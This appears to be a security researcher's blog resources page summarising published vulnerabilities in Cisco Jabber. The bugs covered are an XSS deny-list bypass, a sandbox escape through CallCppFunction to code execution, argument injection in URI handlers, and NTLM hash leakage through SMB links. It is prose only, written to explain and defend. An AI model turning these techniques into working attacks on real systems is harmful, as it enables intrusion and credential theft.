Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cisco Jabber is a video conferencing and instant messaging application used at many businesses. Jabber is built with Chromium Embedded Framework (CEF), which allows for embedded browsers to be put into the application.

The first vulnerability is a classic XSS bug. The application was using a deny list of bad attributes for custom style HTML. However, the list was not comprehensive and could be bypassed.

Although the CEF is in a sandbox, a way to escape this sandbox was identified. A function called CallCppFunction was noticed that calls an arbitrary executable on the system. By abusing this, and a built in file transfer feature, it was possible to execute arbitrary code on the system by XSS!

A vulnerability was discovered with several of the custom URI handlers. The protocol handler does not consider the case where a space is used. Because of this, we can inject arbitrary arguments into the binary, allowing for RCE on the CEF handling.

The next bug discovered was that SMB links were clickable within application. This is very bad because NTLM hashes will be sent to the user, allowing for the ability to learn the users password. This vulnerability can also be exploited by putting the link into an img tag instead of a clickable link.

Overall, several really good vulnerability classes here that demonstrate the importance of good Desktop security.